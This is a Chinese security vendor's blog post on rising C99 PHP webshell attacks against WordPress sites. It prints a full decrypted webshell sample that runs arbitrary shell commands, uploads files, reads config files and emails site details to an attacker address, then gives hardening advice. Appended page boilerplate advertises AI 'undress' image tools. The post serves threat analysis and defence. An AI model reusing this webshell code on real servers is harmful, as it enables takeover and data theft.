wordpress c99 php webshell 攻击加剧 安恒 明御APT预警平台webshell审计 告警
近期,IBM的管理安全服务(MSS) 团队发出警告,称其监测到通过利用C99 php webshell,大量WordPress站点遭受到新的攻击 ,提醒WordPress站点管理员应及时扫描并修复站点漏洞。
据悉,基于IBM MSS团队长期对恶意事件的监测分析,安全研究人员发现在过去的两个月,出现了类C99 webshell引起的流量异常,其中在二月份监测到的事件数量为404件,而在三月份则达到588件,具体如下
详细新闻见
https://securityintelligence.com/got-wordpress-php-c99-webshell-attacks-increasing/
安恒研究院通过 google搜索 收集了c99 webshell样本
解密后得到
error_reporting ( 0 ) ;
if ( ! isset ( $_SESSION [ ‘bajak’ ])) {
$visitcount = 0 ;
$web = $_SERVER [ ‘HTTP_HOST’ ] ;
$inj = $_SERVER [ ‘REQUEST_URI’ ] ;
$body = “ada yang inject \n { $web }{ $inj }” ;
$safem0de = @ ini_get ( ‘safe_mode’ ) ;
if ( ! $safem0de ) {
$security = ‘SAFE_MODE = OFF’ ;
} else {
$security = ‘SAFE_MODE = ON’ ;
}
$serper = gethostbyname ( $_SERVER [ ‘SERVER_ADDR’ ]) ;
$injektor = gethostbyname ( $_SERVER [ ‘REMOTE_ADDR’ ]) ;
mail ( ‘cumicd@gmail.com’ , “{ $body }” , “Hasil Bajakan http://{ $web }{ $inj } \n { $security } \n IP Server = { $serper } \n IP Injector= { $injektor }” ) ;
$_SESSION [ ‘bajak’ ] = 0 ;
} else {
$_SESSION [ ‘bajak’ ] ++ ;
}
if ( isset ( $_GET [ ‘clone’ ])) {
$source = $_SERVER [ ‘SCRIPT_FILENAME’ ] ;
$desti = $_SERVER [ ‘DOCUMENT_ROOT’ ] . ‘/images/stories/food/footer.php’ ;
rename ( $source , $desti ) ;
}
$safem0de = @ ini_get ( ‘safe_mode’ ) ;
if ( ! $safem0de ) {
$security = ‘SAFE_MODE : OFF’ ;
} else {
$security = ‘SAFE_MODE : ON’ ;
}
echo ‘
’ ;
echo ‘’ . $security . ‘
’ ;
$cur_user = ‘(‘ . get_current_user ( ) . ‘)’ ;
echo ‘User : uid=’ . getmyuid ( ) . $cur_user . ‘ gid=’ . getmygid ( ) . $cur_user . ‘
’ ;
echo ‘Uname : ‘ . php_uname ( ) . ‘
’ ;
function pwd ( )
{
$cwd = getcwd ( ) ;
if ( $u = strrpos ( $cwd , ‘/’ )) {
if ( $u != strlen ( $cwd ) – 1 ) {
return $cwd . ‘/’ ;
} else {
return $cwd ;
}
} elseif ( $u = strrpos ( $cwd , ‘ \\ ‘ )) {
if ( $u != strlen ( $cwd ) – 1 ) {
return $cwd . ‘ \\ ‘ ;
} else {
return $cwd ;
}
}
}
echo ‘
’ ;echo ‘
’ ;if ( isset ( $_POST [ ‘submit’ ])) {
$uploaddir = pwd ( ) ;
if ( ! ( $name = $_POST [ ‘newname’ ])) {
$name = $_FILES [ ‘userfile’ ] [ ‘name’ ] ;
}
move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name ) ;
if ( move_uploaded_file ( $_FILES [ ‘userfile’ ] [ ‘tmp_name’ ] , $uploaddir . $name )) {
echo ‘Upload GAGAL!!!’ ;
} else {
echo ‘Upload Success to ‘ . $uploaddir . $name . ‘ :\P ‘ ;
}
}
if ( isset ( $_POST [ ‘command’ ])) {
$cmd = $_POST [ ‘cmd’ ] ;
echo ‘
<font>’ . shell_exec ( $cmd ) . ‘</font>’ ;
} elseif ( isset ( $_GET [ ‘cmd’ ])) {
$comd = $_GET [ ‘cmd’ ] ;
echo ‘
<font>’ . shell_exec ( $comd ) . ‘</font>’ ;
} elseif ( isset ( $_GET [ ‘rf’ ])) {
$rf = file_get_contents ( ‘../../configuration.php’ ) ;
echo $rf ;
} else {
echo ‘
<font>’ . shell_exec ( ‘ls -la’ ) . ‘</font>’ ;
}
?>
进一步分析 受害wordpress情况发现
https://www.google.com.hk/?gws_rd=ssl#safe=strict&q=pagat+shell
Webshell可允许攻击者在服务器上运行终端命令或上传新的文件到站点上,新的文件可以是更具侵入性的webshells,DDoS客户端,比特币矿工软件或者是其他的恶意软件
据IBM MSS团队称,截至至2016年4月12日,仅通过Google 搜索引擎简单查询,就发现其中约有32000个WordPress站点存在pagat.txt文件
apt预警平台能够实时监测到webshell攻击行为并告警 c99的webshell也没能逃过 apt 预警平台的规则 被准确的告警出来帮助用于第一时间发现webshell攻击行为
安全建议:
基于目前的情况,建议站点管理员可以进行如下操作,
1、编辑php.ini文件,禁用base64解码功能。在php.ini文件中,找到相关配置语句“disable_functions =”,将该语句设置成“disable_functions = eval,base64_decode, gzinflate”;
2、更改上传文件夹名称。WordPress 允许通过上传程序将文件写入到上传文件夹,如果用户仍然使用默认名称,攻击者可较为容易推测到上传文件的具体路径,使得攻击者上传包含 shell 脚本的PHP文件的成本大大降低;
3、安装一款可用性较强的安全插件,如wordfence WordPress 插件;
4、进行安全扫描。建议使用开源扫描工具,对上传文件进行全量扫描,这里可使用扫描工具Modsecurity,同时通过AWVS或者WordPress 安全扫描器对站点进行扫描,及时发现漏洞,并进行修复加固;
5、如果发现站点已经被感染了,建议及时变更站点的所有管理账户密码,并告知站点用户进行密码变更。
安全研究员:zise
PHP vs. Python: Understanding the DifferencesApr 11, 2025 am 12:15 AMPHP and Python each have their own advantages, and the choice should be based on project requirements. 1.PHP is suitable for web development, with simple syntax and high execution efficiency. 2. Python is suitable for data science and machine learning, with concise syntax and rich libraries.
PHP: Is It Dying or Simply Adapting?Apr 11, 2025 am 12:13 AMPHP is not dying, but constantly adapting and evolving. 1) PHP has undergone multiple version iterations since 1994 to adapt to new technology trends. 2) It is currently widely used in e-commerce, content management systems and other fields. 3) PHP8 introduces JIT compiler and other functions to improve performance and modernization. 4) Use OPcache and follow PSR-12 standards to optimize performance and code quality.
The Future of PHP: Adaptations and InnovationsApr 11, 2025 am 12:01 AMThe future of PHP will be achieved by adapting to new technology trends and introducing innovative features: 1) Adapting to cloud computing, containerization and microservice architectures, supporting Docker and Kubernetes; 2) introducing JIT compilers and enumeration types to improve performance and data processing efficiency; 3) Continuously optimize performance and promote best practices.
When would you use a trait versus an abstract class or interface in PHP?Apr 10, 2025 am 09:39 AMIn PHP, trait is suitable for situations where method reuse is required but not suitable for inheritance. 1) Trait allows multiplexing methods in classes to avoid multiple inheritance complexity. 2) When using trait, you need to pay attention to method conflicts, which can be resolved through the alternative and as keywords. 3) Overuse of trait should be avoided and its single responsibility should be maintained to optimize performance and improve code maintainability.
What is a Dependency Injection Container (DIC) and why use one in PHP?Apr 10, 2025 am 09:38 AMDependency Injection Container (DIC) is a tool that manages and provides object dependencies for use in PHP projects. The main benefits of DIC include: 1. Decoupling, making components independent, and the code is easy to maintain and test; 2. Flexibility, easy to replace or modify dependencies; 3. Testability, convenient for injecting mock objects for unit testing.
Explain the SPL SplFixedArray and its performance characteristics compared to regular PHP arrays.Apr 10, 2025 am 09:37 AMSplFixedArray is a fixed-size array in PHP, suitable for scenarios where high performance and low memory usage are required. 1) It needs to specify the size when creating to avoid the overhead caused by dynamic adjustment. 2) Based on C language array, directly operates memory and fast access speed. 3) Suitable for large-scale data processing and memory-sensitive environments, but it needs to be used with caution because its size is fixed.
How does PHP handle file uploads securely?Apr 10, 2025 am 09:37 AMPHP handles file uploads through the $\_FILES variable. The methods to ensure security include: 1. Check upload errors, 2. Verify file type and size, 3. Prevent file overwriting, 4. Move files to a permanent storage location.
What is the Null Coalescing Operator (??) and Null Coalescing Assignment Operator (??=)?Apr 10, 2025 am 09:33 AMIn JavaScript, you can use NullCoalescingOperator(??) and NullCoalescingAssignmentOperator(??=). 1.??Returns the first non-null or non-undefined operand. 2.??= Assign the variable to the value of the right operand, but only if the variable is null or undefined. These operators simplify code logic, improve readability and performance.
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
MantisBT
Mantis is an easy-to-deploy web-based defect tracking tool designed to aid in product defect tracking. It requires PHP, MySQL and a web server. Check out our demo and hosting services.
ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment
SublimeText3 Chinese version
Chinese version, very easy to use
PhpStorm Mac version
The latest (2018.2.1) professional PHP integrated development tool
SecLists
SecLists is the ultimate security tester's companion. It is a collection of various types of lists that are frequently used during security assessments, all in one place. SecLists helps make security testing more efficient and productive by conveniently providing all the lists a security tester might need. List types include usernames, passwords, URLs, fuzzing payloads, sensitive data patterns, web shells, and more. The tester can simply pull this repository onto a new test machine and he will have access to every type of list he needs.
